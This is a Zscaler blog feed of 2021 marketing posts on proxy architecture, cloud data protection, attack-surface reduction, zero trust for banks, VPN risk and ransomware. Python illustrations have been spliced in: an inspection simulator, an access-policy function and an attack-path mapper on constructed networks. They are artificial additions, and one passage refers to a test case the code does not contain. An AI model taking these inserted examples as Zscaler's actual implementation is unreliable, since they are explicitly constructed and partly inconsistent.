Research Blogs Feed
Zscaler Blog — News and views from the leading voice in cloud security.

Why Next-Generation Firewalls Can Never Be Proxies: The Right Architecture Matters

On rare occasions, a company has the vision, tenacity, execution—and a helping of luck—to think differently about a significant challenge and effect change across an industry. Once upon a time, the rise of enterprise apps led to the introduction of the next-generation firewall, which was needed in a time when the traditional castle-and-moat security model still made sense. It was the right idea at the right time, and it changed the face of network security.

Today, we are at a similar inflection point: the massive acceleration in cloud adoption and digital transformation over the past year has obliterated the perimeter, with apps, users, and workloads everywhere. In today’s cloud- and mobile-first world, traditional approaches to network security have become irrelevant, with enterprises looking for a revolutionary change to get better cyberthreat and data protection, not simply incremental advancements. Unlike the evolutionary shift from traditional firewalls to NGFW, it’s time for an architecture that redefines the fabric of the WAN and recognizes how the internet is becoming the new corporate network—and that the center of gravity has shifted from the data center to the cloud. We can’t apply approaches that once worked for the perimeter in today’s world. And just like those that came before them, legacy vendors are trying to maintain relevance by lifting and shifting their traditional products to the cloud, without any fundamental change in architecture, outside of losing the fans and physical network ports.
It’s great to see firewall vendors recognize the importance of a proxy architecture, with some starting to bolt them on for traffic redirection to their “firewalls in the cloud,” negating the core performance and security benefits of a cloud-native, true edge, highly scalable proxy architecture.

When we started our journey to redefine networking and security more than a decade ago, our key insight was the need for a comprehensive, cloud-native architecture built around a true proxy, acting as an exchange between employees, clouds, customers, and partners. When done right, you can inspect all transactions across all traffic, including SSL, at wire speed. Creating a strong door at the edge of your perimeter or data center no longer works—and in this blog series, I’ll share my perspective on why architecture matters for today’s cloud-first, digitally transformed world.

Without proper inspection, you have no security.

True proxies like Zscaler’s Zero Trust Exchange offer complete threat and data loss protection by terminating every connection for full inline inspection, including across all SSL/TLS traffic. Unlike approaches that employ proxies as simple traffic forwarders to firewall-based passthrough architectures, our platform applies AI-powered analytics along with threat and data leakage signatures on a packet-by-packet basis until a conclusive verdict can be determined, all at line rate. As all firewalls are stream-based, it takes a certain number of packets to enact policy, allowing command-and-control, data, or even malicious payloads to leak through like a sieve before action can be taken. Our true proxy architecture doesn’t allow a single packet to leak through, and further enables our platform to hold and quarantine unknown files for inspection, stopping the barrage of unknown malware released by attackers every day.
Without proper inspection, sophisticated attackers can use this “low and slow” packet leakage or lack of patient-zero protection to devastating effect.

A true cloud-native architecture, not a lift-and-shift.

Unlike architectures based on single-tenant virtual appliances deployed in the public cloud, Zscaler’s cloud-native, multitenant platform was purpose-built to handle billions of transactions, process trillions of signals with AI/ML, inspect an unlimited volume of encrypted traffic, and support the world’s largest enterprises with proven scale, performance, and transparent SLAs you can trust. With virtual firewall approaches, once the limited SSL inspection capacity is reached, customers need to decide between no security or no connection, which could never happen with a true proxy architecture. Aligned with the foundation of Gartner’s secure access service edge (SASE) framework, our platform processes all traffic in a single pass across all capabilities, not a daisy chain of proxies for traffic-forwarding, legacy virtual firewall appliances for policy, and yet another proxy for data loss prevention. Complexity is the enemy of good security, and a lack of native integration across different technology stacks inevitably results in poor performance, security, and reliability.

As digital transformation makes traditional network security irrelevant, we will continue to accelerate our pace of innovation in cloud security—all built on a true cloud-native proxy architecture. We welcome new entrants to the proxy revolution as further validation that the cloud—not the network—is the future of digital business. We’ve been here for a while, and know that healthy competition is always good for those we care about most, our customers. We encourage everyone to get more information on our Zero Trust Exchange and why it resulted in Zscaler being the only Leader in the 2020 Gartner Magic Quadrant for Secure Web Gateways.
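The difference between "enact policy after a certain number of packets" and "terminate, hold, then decide" is easiest to see on a byte count. The following Python script is an added illustration, not Zscaler's code and not a description of how the Zero Trust Exchange is implemented: a passthrough scanner that forwards each packet as long as the bytes seen so far are clean, beside a terminating proxy that holds the whole object until a verdict exists. The signatures, payloads and packet sizes are all constructed.

```python
"""Added example (not Zscaler's code): stream-based passthrough inspection
versus a terminating proxy, measured by how many bytes reach the client
before a verdict. Signatures, payloads and packet sizes are constructed."""
from dataclasses import dataclass

# Constructed content signatures standing in for a threat/DLP ruleset.
SIGNATURES = (b"EVIL-MARKER", b"C2-BEACON")


@dataclass(frozen=True)
class Result:
    verdict: str            # "clean" or "blocked"
    bytes_delivered: int    # bytes that reached the client before the verdict
    packets_forwarded: int


def packetize(payload: bytes, mtu: int) -> list:
    """Split an object into MTU-sized packets, as a stream would see it."""
    return [payload[i:i + mtu] for i in range(0, len(payload), mtu)]


def matches(data: bytes) -> bool:
    return any(sig in data for sig in SIGNATURES)


def stream_inspect(payload: bytes, mtu: int) -> Result:
    """Passthrough model: scan the reassembled window after each packet and
    forward the packet unless a signature has matched by then. A signature
    split across a packet boundary is still caught, but every packet that
    was forwarded before the match completed has already leaked."""
    window = b""
    delivered = packets = 0
    for pkt in packetize(payload, mtu):
        window += pkt
        if matches(window):
            return Result("blocked", delivered, packets)
        delivered += len(pkt)
        packets += 1
    return Result("clean", delivered, packets)


def proxy_inspect(payload: bytes, mtu: int) -> Result:
    """Terminating proxy model: hold the complete object, decide, then
    either release it to the client or drop it. Nothing is forwarded
    before the verdict."""
    held = b"".join(packetize(payload, mtu))   # full object reassembled
    if matches(held):
        return Result("blocked", 0, 0)
    return Result("clean", len(held), len(packetize(held, mtu)))


def leaked_bytes(payload: bytes, mtu: int) -> int:
    """Bytes the stream model released that the proxy model would not."""
    return (stream_inspect(payload, mtu).bytes_delivered
            - proxy_inspect(payload, mtu).bytes_delivered)


if __name__ == "__main__":
    # Constructed object: 3000 benign bytes, then a signature, then more.
    sample = b"A" * 3000 + b"EVIL-MARKER" + b"B" * 500
    print("stream:", stream_inspect(sample, 1000))
    print("proxy: ", proxy_inspect(sample, 1000))
    print("leaked:", leaked_bytes(sample, 1000))
```

The second constructed case in the test, a signature that straddles a packet boundary, is the one worth noticing: the stream model still reaches the right verdict, but only after the first packet is already on the wire, which is the leakage the post is describing.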
In my next blogs, I’ll cover why NGFWs, even those in the cloud, can never implement a zero trust architecture, why it takes cloud-hosted virtual firewalls six to nine months to be updated with the latest capabilities, and what a robust cloud-native edge should look like. The right architecture makes all the difference.

Thu, 25 Feb 2021 08:00:02 -0800 Scott Simkin

Cloud Data Protection: Six Critical Challenges To Tackle

Data Loss Prevention (DLP) is the first term that comes to mind for most when thinking about data protection, but DLP is really just one piece of a broader cloud data protection strategy. DLP must build on a solid foundation of comprehensive visibility, a solid security posture, and a minimized attack surface. There are six critical challenges to laying this foundation.

Six Critical Cloud Data Protection Challenges

1: Lack of visibility into application usage.

You can’t protect what you don’t know about, so the first challenge to overcome is a lack of visibility into application usage. Visibility must extend across both your sanctioned IT landscape and your shadow IT landscape. With sanctioned applications, you need insights into what applications are in use, and how they are being used. For example, insights into which AWS services your development team is using, or which third-party applications are connected to Office 365, will help you understand where there may be weaknesses in your data protection strategy. With shadow IT applications, visibility provides the basis for deciding what to allow, what to restrict, and what to block altogether. Keep in mind that shadow IT doesn’t just mean SaaS applications - there are many PaaS/IaaS services now being used outside of IT’s purview. Protecting those applications is every bit as critical as getting a handle on shadow IT SaaS applications.

2: Insecure Configurations lead to exposure and breaches

Next up, the baseline configuration of your sanctioned applications must be properly secured.
On this front, misconfiguration of cloud storage services has led to many high-profile exposures of sensitive data over the past few years, but these types of misconfigurations occur with all types of cloud applications. Overcoming this challenge means identifying and tackling identity, encryption, networking, third-party connections and sharing, and a whole host of other configurations that can result in loss of sensitive data if not appropriately secured.

3: Risky contexts require additional controls

A privileged user on a managed device that has been appropriately protected has a different risk profile than that same user on an unmanaged device, coming from a new location, and attempting to download sensitive data. Context is key to strong access control, ensuring that the level of access provided corresponds to the risk of data loss given that context.

4: Inherently risky apps have no legitimate business use

Shifting gears to focus on shadow IT, there are some inherently risky applications that have no legitimate business use. Applications that are known to host malware, apps with questionable data protection policies, previously unknown applications, and a broad range of undesirable categories of applications all should be blocked outright on corporate networks and devices.

5: Less risky sanctioned apps tolerated but controlled

Not all shadow applications can be blocked. Today’s workers expect some ability to perform low-risk personal activities from their managed devices and from the corporate network. Sending personal emails, taking a break to check out The Gram, paying bills online. These are all applications that you are more than likely going to end up allowing, but in a controlled fashion. You might want to allow social media viewing but prohibit posting. Or perhaps you want to give employees the ability to read and send emails, but not upload attachments. These access control capabilities can help reduce risk, even before you apply DLP policies.
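Challenges 3, 4 and 5 are all one decision made with different inputs: the application's category, the user's context, and the specific activity. The Python below is an added illustration of that decision, not Zscaler's policy engine or its policy format. The request attributes, application categories, risk weights and thresholds are constructed; what the code shows is that the same privileged user downloading the same sensitive file gets a different answer on a managed device at a known location than on an unmanaged device somewhere new, and that a tolerated personal app can be allowed for viewing while posting or uploading from it is refused.

```python
"""Added example (not Zscaler's policy engine or format): a context-aware
access decision covering the situations in challenges 3, 4 and 5. The
request attributes, application categories, risk weights and thresholds
are constructed for illustration."""
from dataclasses import dataclass
from enum import Enum


class Decision(Enum):
    ALLOW = "allow"
    STEP_UP = "step_up"      # allow only after stronger authentication
    BLOCK = "block"


@dataclass(frozen=True)
class Request:
    user_privileged: bool
    device_managed: bool
    location_known: bool
    app_category: str       # sanctioned | personal_tolerated | malware_host | unknown | questionable_policy
    activity: str           # view | download | post | upload
    data_sensitive: bool


# Shadow-IT categories the post says have no legitimate business use (challenge 4).
BLOCKED_CATEGORIES = {"malware_host", "unknown", "questionable_policy"}
# Activities that move data outward; tolerated personal apps get these cut (challenge 5).
OUTBOUND_ACTIVITIES = {"post", "upload"}


def context_risk(req: Request) -> int:
    """Constructed additive risk score for the request context (challenge 3)."""
    score = 0
    if not req.device_managed:
        score += 2                      # unmanaged endpoint
    if not req.location_known:
        score += 1                      # new or unexpected location
    if req.data_sensitive and req.activity == "download":
        score += 1                      # data leaving to the endpoint
    if req.user_privileged and not req.device_managed:
        score += 1                      # privileged credentials on an untrusted device
    return score


def decide(req: Request) -> Decision:
    """Category first, then activity, then context; thresholds are constructed."""
    if req.app_category in BLOCKED_CATEGORIES:
        return Decision.BLOCK
    if req.app_category == "personal_tolerated":
        # Viewing is fine; posting or uploading from the corporate device is not.
        return Decision.BLOCK if req.activity in OUTBOUND_ACTIVITIES else Decision.ALLOW
    risk = context_risk(req)            # sanctioned app: weigh the context
    if req.data_sensitive and risk >= 4:
        return Decision.BLOCK
    if risk >= 2:
        return Decision.STEP_UP
    return Decision.ALLOW


if __name__ == "__main__":
    # The two contexts contrasted in challenge 3 (constructed requests).
    trusted = Request(True, True, True, "sanctioned", "download", True)
    risky = Request(True, False, False, "sanctioned", "download", True)
    print("managed device, known location:", decide(trusted).value)
    print("unmanaged device, new location: ", decide(risky).value)
    print("social media view:", decide(Request(False, True, True, "personal_tolerated", "view", False)).value)
    print("social media post:", decide(Request(False, True, True, "personal_tolerated", "post", False)).value)
```

The ordering in `decide` is deliberate: category and activity rules are cheap and absolute, so they run before any risk arithmetic, and the context score only ever decides among sanctioned applications.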
6: Sensitive data must remain protected

The final piece of the puzzle is protecting sensitive data. At this point, you’ve understood which cloud applications are in use and how, you’ve built a strong security posture for those applications, and you’ve used access control to further limit the risky contexts and behaviors that shouldn’t even be able to access sensitive data. The final step is to leverage DLP, both inline and out-of-band, to control which data can be accessed and by whom.

Solving the six cloud data protection challenges

Taking all of this on at once might seem daunting. After all, who has the budget, team, and time to buy, implement, and maintain six separate tools from six different vendors? Fortunately, Zscaler has built all of the capabilities necessary for you to overcome all cloud data protection challenges, across the entire landscape of sanctioned and shadow IT applications. Comprehensive data protection, built on the Zero Trust Exchange platform that is already proven and deployed across thousands of enterprises. In fact, if you’re already a Zscaler customer, enabling these capabilities might be as easy as taking a few minutes to configure them.

Tue, 23 Feb 2021 09:10:55 -0800 Rich Campagna

Three Paths for Reducing the Network Attack Surface

With each passing year, companies’ networks grow. Increasing amounts of data, expanded business partnerships, and the introduction of new technology to replace outdated methods of conducting business all contribute to this growth. Consequently, the network attack surface is growing proportionally. Stopping or limiting network sprawl seems impossible given today’s business requirements. At the same time, the onus for securing growing networks—whether they’re on-premises or in the cloud—falls to security teams. The argument could be made that a security practitioner’s job is actually risk reduction; everything else supports risk management.
Securing the network, encrypting databases, and correctly configuring devices? All means to risk reduction. Patching and testing vulnerabilities? Risk reduction. All the while one thing is clear: as companies’ networks containing valuable data and applications grow, cybercriminals will target those networks to make a profit, access secrets, or disrupt normal operations. To reduce risk, defenders must shrink the network attack surface.

Shrinking the attack surface isn’t a simple matter, though. Security teams can’t insist the business stop collecting data or adopting technology that makes employees’ lives easier and more efficient. They can’t disallow development using containers or access from mobile devices. What’s more, it’s far from enough to ring-fence the network and call it a day.

Today’s cyber attackers invariably exploit the easiest vulnerability to enter companies’ networks undetected. However, the initial entry point is rarely the intended target. Attackers almost always use a multi-step process for exploiting exposed network pathways to move laterally towards companies’ most valuable data and applications. Within any given network there may be hundreds or even thousands of these network pathways, yet most security and networking teams don’t know what those pathways are, much less which ones offer the shortest viable paths that allow attackers to efficiently reach their target. When focusing on risk reduction, without a clear understanding of all the ways an attacker could reach a target, it is impossible to decrease the number of those available routes—and thus reduce the network attack surface. First, though, defenders need an assessment of all assets in the environment before they can quantify how attackers might use the network to exploit the assets that are stored and communicating there.
Identify assets and exposures

If the purpose of the security program is to reduce risk to the business by mitigating cybersecurity risk, the first step should be to assess the network attack surface:

What assets does the company have in on-premises data centers, the cloud, and container environments?
Which assets are most critical to the business, i.e., which ones would materially impact the business if disrupted, damaged, or exposed?
What and where are the organization’s most exploitable vulnerabilities (e.g., phishing, insecure code, unpatched systems)?
How could an attacker reach the “crown jewels” if initial vulnerabilities are exploited?
How are workloads and applications interconnected?
What are the most likely pathways an attacker could use to move laterally toward business-critical assets?

Understanding the environment and its exposure requires ongoing assessment. Ideally a multi-pronged approach combining automated scanning and manual testing is used, but given the size and scope of most organizations’ networks, the only way to stay continually up-to-date is automated discovery of assets and available network paths. Network blind spots are a huge challenge when it comes to protecting data; implementing automated discovery tools can substantially improve network visibility and contribute to reducing risk.

Eliminate unnecessary pathways

Protecting the organization from cyber intrusions requires a multilayered strategy, and one effective way to reduce the network attack surface is to decrease the number of routes an attacker can use to reach target systems. Offensive maps are an extremely valuable tool for analyzing which low-friction network pathways exist between attackers and targets, and for anticipating attackers’ next move given a view of all viable options.
Once created, defenders can use their newfound network visibility to determine which vectors are most likely to be exploited, and block never- or infrequently-used pathways to and from critical assets to reduce attackers’ abilities to move laterally inside the network. In other words, pathways not required by applications but that exist simply because they are on a connected network should be blocked for use as a communication vehicle.

Apply microsegmentation at the workload level

Once an adversary gains access to the network through an initial exploit (e.g., phishing, software vulnerability), the security team must be able to prevent unauthorized access to and tampering with critical databases and applications. Limiting the number of paths attackers can use to travel from Point A to Point B helps localize focus, but it’s not enough. Revisiting the idea of a multilayered strategy to manage expansive network attack surfaces, microsegmentation at the workload level builds tight boundaries around companies’ sensitive data and systems.

Unfortunately, many security and networking professionals have an unfavorable view of microsegmentation. Old methods of microsegmentation using IP addresses and VLANs are kludgy, time-consuming, and expensive. Creating a firewall rule for a new application on the network can take hours, configuration issues can lead to outages, and static policies need to be constantly manually updated. In addition, network-based microsegmentation tools necessitate re-architecting both the network and application (i.e., translating “network speak” into “application speak”). It’s no wonder that microsegmentation is met with trepidation. Modern microsegmentation, however, is based on software identity—using cryptographic attributes of the software, as opposed to the network, for control decisions.
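The three steps above (map the pathways, block the ones no application needs, then decide by software identity rather than address) can be shown together on a small constructed network. The Python below is an added illustration, not Zscaler's tooling: a depth-first enumeration of attack paths from an assumed initial foothold to a crown-jewel database, a pruning pass that keeps only the pathways on a required-flow list, and a connection check keyed on the SHA-256 of the calling binary instead of its source IP. The workload names, pathways, required-flow list and binary contents are all constructed.

```python
"""Added example (not Zscaler's tooling): an "offensive map" over a
constructed network. Workloads are nodes, currently reachable pathways
are directed edges, and the database is the crown jewel. We enumerate
attack paths from an assumed initial foothold, prune every pathway no
business application requires, and compare. A final allow-list keyed on
the SHA-256 of the calling binary (software identity) instead of source
IP stands in for application-centric microsegmentation."""
import hashlib

# Constructed map: each workload and the workloads it can currently reach.
PATHWAYS = {
    "laptop": {"jump", "web", "fileshare"},
    "jump": {"app", "db"},
    "web": {"app"},
    "fileshare": {"db"},
    "app": {"db"},
    "db": set(),
}

# Pathways that business applications actually need (constructed allow-list).
REQUIRED = {
    ("laptop", "web"), ("web", "app"), ("app", "db"),
    ("laptop", "jump"), ("jump", "app"),
}


def attack_paths(graph: dict, src: str, dst: str) -> list:
    """All simple paths from src to dst, shortest first (depth-first search)."""
    found = []

    def walk(path):
        node = path[-1]
        if node == dst:
            found.append(list(path))
            return
        for nxt in sorted(graph.get(node, ())):
            if nxt not in path:        # simple paths only: no revisits
                path.append(nxt)
                walk(path)
                path.pop()

    walk([src])
    return sorted(found, key=len)


def prune(graph: dict, required: set) -> dict:
    """Block every pathway that is not on the required-flow list."""
    return {n: {m for m in nbrs if (n, m) in required} for n, nbrs in graph.items()}


def software_identity(binary: bytes) -> str:
    """Cryptographic identity of the software making the request."""
    return hashlib.sha256(binary).hexdigest()


# Constructed build of the application server that may talk to the database.
APP_SERVER_BINARY = b"constructed app-server build 1.2.3"
ALLOWED_TO_DB = {software_identity(APP_SERVER_BINARY)}


def db_connection_allowed(calling_binary: bytes, src_ip: str) -> bool:
    """Identity-based decision: src_ip is accepted but ignored on purpose.
    Two processes on the same host and address get different answers if
    the software differs, which IP- or VLAN-based rules cannot express."""
    return software_identity(calling_binary) in ALLOWED_TO_DB


if __name__ == "__main__":
    before = attack_paths(PATHWAYS, "laptop", "db")
    after = attack_paths(prune(PATHWAYS, REQUIRED), "laptop", "db")
    print(f"paths before: {len(before)}, shortest: {len(before[0]) - 1} hops")
    print(f"paths after:  {len(after)}, shortest: {len(after[0]) - 1} hops")
    print(db_connection_allowed(APP_SERVER_BINARY, "10.0.0.5"),
          db_connection_allowed(b"tampered build", "10.0.0.5"))
```

On this map, pruning removes the two-hop routes through the jump host and the file share; what remains are the routes the applications themselves use, and the last check shows that even on those routes the database answers to the software's hash, not to where the packet came from.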
Especially given today’s dynamic network environments, not only is software identity a more reliable construct on which to enforce access decisions, but it eliminates the complexity of creating multiple rules for each application, reduces the time it takes to create policies, and results in policies that are supported across any platform (i.e., multicloud environments, containers). Further, application-centric policies adapt to the environment, which means that administrators can create and manage policies from one centralized location and retain visibility regardless of where workloads communicate.

Conclusion

Paring down the network attack surface to reduce overall organizational risk is not easy, to be certain. Simply keeping abreast of all resources across ever-growing networks is a massive challenge. However, in today’s complex threat landscape, it’s imperative for security and networking teams to simplify the protection strategy by improving network visibility and implementing application-centric, adaptive security control. To get started, organizations should:

Identify the extent of the network attack surface, including systems, devices, users, workloads, and exposed network paths;
Prioritize protection based on the criticality of assets and block network paths not required by business applications; and
Use application-centric microsegmentation to prevent unauthorized access and communication on the network.

Thu, 18 Feb 2021 08:00:02 -0800 Dan Perkins

No More Putting Out Fires (and Other Benefits of Working with Zscaler)

As a member of the volunteer fire brigade, one of my tasks is to put out fires. I like to do this in my free time, but not in the context of my job. In the area of cybersecurity, in particular, foresight and prevention are essential to the security of a company.
That’s why, in 2015, it became apparent to those of us in the IT department of SICK that the “end of life” of our legacy appliances represented an ideal opportunity to make the switch to cloud security before the hardware solution would put us in constant firefighting mode. At that time, cloud solutions were still early in the technology adoption life cycle and were considered carefully, especially at the management level of a German medium-sized company, such as SICK. But the technological superiority of Zscaler helped us convince our stakeholders, including the works council, to become “early adopters” and put the company in a strong position for future growth. And that paid off. In retrospect, that decision has proven itself many times over, something we witness on a nearly monthly basis.

Zscaler was the first large cloud provider that we partnered with. It was extremely beneficial to start our digital transformation by focusing on security, which was critical to adopting a cloud-ready infrastructure and rolling out future cloud projects. It has also allowed us to be proactive, putting strategic plans in place, rather than always reacting to new requirements and putting out fires…so to speak. Today, the highly integrated Zscaler Zero Trust Exchange is at the heart of our IT infrastructure and enables our decentralized development teams to easily collaborate and use cloud applications without security being a bottleneck.

When we started working with Zscaler, we had four internet breakouts worldwide but realized that more things would be happening in the cloud. Therefore, it would not have made economic or operational sense to install hardware in new locations. In the past year alone, we were able to open more than 40 new locations based on our cloud-ready infrastructure and provide fast access to the internet and SaaS apps within a very short time.
With local internet breakouts and the Zscaler Client Connector, our employees are always protected and can access their applications as quickly as possible.

For me as an in-house cybersecurity consultant, Zscaler was also an absolute game-changer. Having to log in to various admin consoles in the morning used to cost me a lot of time and nerves. Today, I have a central management interface with Zscaler. When I add a new rule, I don't have to worry about the best way to implement it technically or how to distribute it to dozens of appliances. My admin work has been significantly simplified since Zscaler. With the time gained, I can now provide our internal customers with the service they need. I also no longer have to spend weekends doing maintenance work, but can put out real fires with my fire department colleagues.

The switch to Zscaler was also incredibly interesting for me professionally. I keep coming into contact with new subject areas due to the constant innovations of the platform. We have rolled out full SSL inspection and added Cloud Firewall and Cloud Sandbox to our security portfolio. Even in our ongoing projects rolling out cloud collaboration tools, Zscaler has been indispensable. We are also considering implementing additional platform components, such as Zscaler Private Access and Zscaler Digital Experience. The Zscaler Zero Trust Exchange is much more than the cloud version of a web proxy that we started with five years ago. It gives me and the team the opportunity to decisively advance the digital transformation of SICK.

Read the case study to learn more about how Zscaler helped SICK on its digital transformation.

Tue, 16 Feb 2021 11:58:28 -0800 Sven Hinze

It’s Time for Banks to Release the Brakes and Accelerate Their Digital Transformation

Over the past year, like many industries, the financial sector has faced a range of both challenges and opportunities, leading to a decade’s worth of digital transformation in 12 short months.
From internal requirements that demanded secure yet efficient access for remote workforces, to external pressures such as the rise of cashless payments and other forms of frictionless financial processes, the pandemic required banks to examine and overhaul many of their processes.

Financial organisations have traditionally struggled in adopting innovations. They must abide by strict policies to meet the requirements of their regulators, which has often prevented them from gaining the benefits of new technologies. But as financial institutions have had to adapt to an increasingly digital world, it is imperative they have security solutions in place that not only provide security for users and data, but also ensure compliance with policies and regulations.

We have seen particular growth in interest from banks and financial services in deploying a cloud-based Zero Trust approach. While one might assume security to be the number one driver for banks, our discussions have highlighted somewhat surprisingly that user experience is more of a priority. Because Zero Trust provides granular access to applications without ever placing users on the network, they can take the direct route to their applications without latency-driving detours.

Addressing financial services’ key pain points

Banks have always been entrusted with the most valuable financial assets, and therefore, in the grand scheme of things, already have a formidable security posture. Traditionally, this has always come at a price, as complex infrastructure usually does not harmonise well with great user experience. Over the past few years, the cloud transformation journey of banks has accelerated dramatically, and the finance sector has invested heavily in cloud infrastructures like AWS, Azure, or Google Cloud and cloud-based office applications. At the same time, many banks kept their legacy infrastructure in place, which holds them back from profiting from the full potential of the cloud.
This traditional architecture serves as a barrier to experiencing the full flexibility and agility. It’s a bit like buying a shiny new sports car, then trying to drive it with the handbrake on! As a result, banks are now looking for ways to help their employees become more productive on the cloud platforms they have developed, and to garner the return on investment of all the cloud infrastructure the industry had been so excited to embrace.

One of the key issues for financial services has been their recent accelerated deployment of Office 365. Migration promised improved efficiency and user productivity, among other benefits. However, it has also led to significant challenges for banks with maintaining user experience due to their legacy hub & spoke network infrastructure and distributed branch model. In order to benefit from cloud apps, financial organisations realised that they had to re-invent their infrastructure in line with their move to a cloud-based ecosystem to grant latency-free access as the foundation for an optimal user experience.

A future vision of balancing user friendliness with security

In the wake of the pandemic, an additional challenge had to be overcome when staff were sent to their home offices nearly overnight. For an increasingly remote workforce, the balance between efficient and secure access on the one hand and maintaining superior user experience on the other hand became even more important. The existing legacy network infrastructure of financial organisations needed to be upgraded to meet the sudden demand for remote connectivity and modern secure access to all the multi-cloud environments that had been implemented. A future-proof infrastructure that can support flexible requirements during the pandemic and beyond, while delivering a great user experience, increasing productivity, and supporting business continuity long term, needs to encompass Zero Trust Network Access.
A Zero Trust approach is built on individual security policies for each employee that grant them granular access to their required business applications without opening up the whole network. With the help of a trusted broker in the cloud, in the form of the Zscaler Zero Trust Exchange, staff can quickly and reliably access only the internal applications they need via a direct internet path once they are authenticated. As users can take the direct route to their applications without the detour over the corporate network, they will profit from superior user experience.

Enabling the future of banking

In many ways, the flexibility enabled by a Zero Trust model is every financial service CTO’s dream. With traffic going securely through the internet instead of having to run through corporate IT, this enables banks to have maintenance-free branches, meaning individual branches are significantly easier to maintain and manage while costs are dramatically reduced. For banks with hundreds of branches in various locations, this almost sounds too good to be true. In fact, the future model of banking might include slimmed-down infrastructures or even a branchless model. From this transition, we will begin to see digital transformation in financial services drive a model of convenience and simplicity—perhaps a kiosk that delivers all the key requirements for banking services—with the secure and frictionless experience consumers have come to expect.

The past year has made clear that if banks want to survive and thrive in a fast-moving landscape, they need to innovate and transform internally. Only a change in their infrastructure allows them to keep pace with user experience expectations both from staff and external customers. In their search for partners to enable their digital transformation journeys, banks must assess whether the solutions they choose truly help release the brakes of legacy infrastructure and enable them to accelerate into the future.
Tue, 16 Feb 2021 23:00:01 -0800 Mark Peet

What Everybody Thinks About VPN but Nobody Talks About

A new report from Cybersecurity Insiders focuses on the use of virtual private networks. The fact that they are a part of the infrastructure in almost every organization in every industry is known. It is also known that the use of VPNs increased dramatically in 2020 as huge swaths of the global labor force began to work remotely. But it seemed unlikely that VPN risks were well understood. Why would organizations continue to invest in technology that is both unpopular with users and vulnerable to attack? Cybersecurity Insiders set out to find out by examining VPN trends with a specific focus on risk.

The 2021 VPN Risk Report is based on a survey of cybersecurity professionals—with more than half of respondents at the director level and above—who offered insight into their remote access environments, how and where users are connecting, the challenges they’re facing, including the rise in VPN vulnerabilities, and whether zero trust will begin to play a role in their remote access strategy. Their answers revealed that IT leaders have been in a real bind. They need to provide remote access to applications in the data center and cloud, but the technology they’ve relied upon for decades is exposing them to risk—and they know it.

Here are some of the report’s key findings:

Companies are aware of VPN risks, but they’re using them anyway.

VPNs have been used for remote access for nearly 30 years and they remain practically ubiquitous. In the survey, 93 percent of respondents reported that they are leveraging VPN services. Even so, 94 percent are aware that VPNs are vulnerable to cybercrime, with attackers targeting remote workers as they try to get access to business resources through the VPN. It would have been hard to miss the countless articles about VPN exploits in 2020, and the news of almost 500 known VPN vulnerabilities listed on the CVE database.
Most worry that the VPN may put their business in jeopardy.

Not only are IT leaders aware of the risk, but nearly three out of four are concerned that the VPN may hinder their ability to keep their organizations secure. So, why are people still using VPN if they know it puts their business at risk? Besides the remote desktop protocol (RDP), which has vulnerabilities of its own, there haven’t been viable alternatives to VPN for decades. Luckily, there are alternatives now, and the following finding from the report shows that they are gaining traction.

Enterprises are considering alternatives to a traditional VPN.

Two-thirds of enterprises are considering alternatives to the VPN. Gartner analyst Rob Smith says, “Corporate VPN is an aging technology as organizations shift to more cloud-based services.” He added, “However, in the wake of the global coronavirus pandemic, companies are realizing they have to fundamentally change the way they work.” The report supports this assertion, as it shows that companies are reevaluating their long-term access strategies and looking to adopt more modern technologies and approaches.

Most companies are making zero trust a priority.

While the concept of zero trust has been around for years, the report shows a huge uptick in enterprises seeking to implement a zero trust model. Seventy-two percent of respondents are prioritizing zero trust, and 59 percent are accelerating their adoption due to the increase in remote work. Part of this shift towards a new model is due to the steady movement towards digital transformation, but it also appears that the pandemic has been a catalyst for organizations not only to prioritize zero trust projects, but to accelerate them forward.
Overall takeaway

An increasing number of organizations have been adopting a zero trust approach to provide secure remote access to internal applications, and the pandemic seems to be accelerating this adoption as organizations prepare for a hybrid workforce, with employees working in the office on some days and remotely on others. Read the full report for all the insights on remote workers, BYOD, VPN use during the pandemic, and what organizations anticipate in the years ahead. Download the Cybersecurity Insiders report today.

Tue, 16 Feb 2021 08:56:22 -0800
Camilla Ahlquist

Preventing the Spread of Ransomware

For most of the world, 2020 was devastating, a year mired in multiple crises. But in at least one industry, 2020 was a banner year! Cybercriminals had a massively productive and profitable year, seizing opportunities to target the millions of people suddenly working from home. Most companies were unprepared to secure an entirely remote workforce, relying on remote desktop protocol (RDP) and strained VPN infrastructures, leaving workers ripe for attack. Ransomware was particularly successful, with estimates that attacks cost businesses $20 billion worldwide in 2020.

Unfortunately, ransomware has become both lucrative and easy to deploy, with sophisticated kits readily available on the dark web that require only a small investment and minimal coding skills. Ransomware is also a high-probability attack from the attacker’s point of view; inevitably, an employee/contractor/partner will be fooled by a convincing-looking email containing a malicious link or attachment, which, upon execution, triggers malware that locks up files on the user’s computer and/or looks for ways to piggyback on existing executables and pathways in the network to find, access, and encrypt company-critical databases.
In successful attacks, affected organizations have to contend with loss of data; system disruptions; inability to serve customers for extended periods; and, in a few cases, a complete operational shutdown until systems, networks, or data are restored to serviceable levels. Needless to say, any company that falls victim to this type of attack is subject to financial, operational, reputational, and potentially regulatory consequences. In other words, the damage from a ransomware attack exceeds the impact on the network.

Conventional methods for handling ransomware

It is far superior to prevent a ransomware attack than to have to deal with the aftermath. Even so, some experts continue to say that the best advice for handling the threat of ransomware is to train users not to click on things and to maintain backups of all business-critical data and information. It’s true that if no person ever clicked on links or downloaded attachments, organizations would be freer from incidents. However, business isn’t conducive to never clicking or downloading, scrutinizing the contents and headers of every email, and questioning each correspondence received throughout each day. Disabling users’ ability to click on a link or download an attachment is one way of approaching the problem, but doing so comes with repercussions beyond cybersecurity—in the eyes of a business executive, the probability of a ransomware attack activated by a user’s click is far less than that person’s inability to do their job effectively if they can’t access important information. Even though ransomware is headline news, most non-security executives (at least those who haven’t lived through the fallout) would say their teams’ productivity takes precedence over the possibility of a cyberattack.

As for backups and disaster recovery plans, there is no doubt that every company should have them. Failing to do so is negligence, at best.
All companies—at some level—will fall victim to a security incident or system outage, even if the impetus is unintentional and not instigated by a nation-state cybercriminal. Planning thoroughly for a disaster, however, does not erase the need for stronger ransomware protection. In other words, even if a company can swiftly recover from a cyberattack (which is unlikely), it doesn’t mean recovery efforts should be the default position. A layered security defense means starting from the viewpoint that the company will execute its best efforts at implementing preventative security controls. An ounce of prevention is worth a pound of cure.

Learn more in this whitepaper: Defending Against Ransomware with Zscaler Workload Segmentation.

Thu, 11 Feb 2021 08:56:45 -0800
Harry Sverdlove

These Two Identity Juggernauts Identified Zscaler as a Leader in Zero Trust for Remote Work

